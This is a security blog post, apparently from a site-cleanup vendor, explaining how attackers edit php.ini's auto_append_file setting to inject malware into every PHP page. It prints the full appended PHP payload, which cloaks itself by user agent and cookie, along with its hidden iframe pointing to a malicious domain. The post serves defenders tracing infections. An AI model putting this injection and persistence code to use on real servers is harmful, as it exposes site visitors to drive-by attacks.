Malware Being Called From Your php.ini File

Is your site infected with malware, and you can’t find it anywhere? It might be a good idea to search outside of your web directory, and look in your main configuration files (specially if you are on a dedicated/VPS server).

We are seeing an increased number of infected sites with malicious iframes, similar to this one:

<style type=”text/css”>#doxig {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id=”doxig” src="http://1306a95ajbr.liga4giurgiu.info/ad.jpg?2"></iframe>

These specific strings aren’t typically found anywhere in the website files, which is very concerning. We’re finding that entire servers are being compromised, and the main server php.ini file (/etc/php/php.ini) has the following setting added:

;auto_append_file = “0ff”

This simple line in the php.ini makes all the php scripts append the output of the file 0ff (/tmp/0ff) to them. So even if your files look clean, the malware is still displayed to anyone visiting the site.

This is the code of the 0ff file:

<?php
if(!@isset($_COOKIE[‘PHPSESS1D’]) &&
 !@preg_match(‘/; Yandex|; Googlebot|linux|macintosh|android|Symbian|iPhone|
Mac OS|Opera Mini|Chrome|Apple/i’,$_SERVER[‘HTTP_USER_AGENT’])) {
 echo ‘<script type="text/javascript">
 d=new Date();
 d&#46setDate(d&#46getDate()+1);
 document&#46cookie="PHPSESS1D=1; path=/; expires=" + d&#46toGMTString();
 </script>’;
 echo ‘<style type="text/css">#doxig {width: 10px;height: 10px;frameborder: no;
visibility: hidden;scrolling: no;}</style><iframe id="doxig" src="
http://1306a95ajbr&#46liga4giurgiu&#46info/ad&#46jpg?2"></iframe>’;
}

So if you are seeing those hidden iframes, try to look at your PHP and main Apache configurations.

Need help with malware? Need someone to clean your site? Sign up here: Sucuri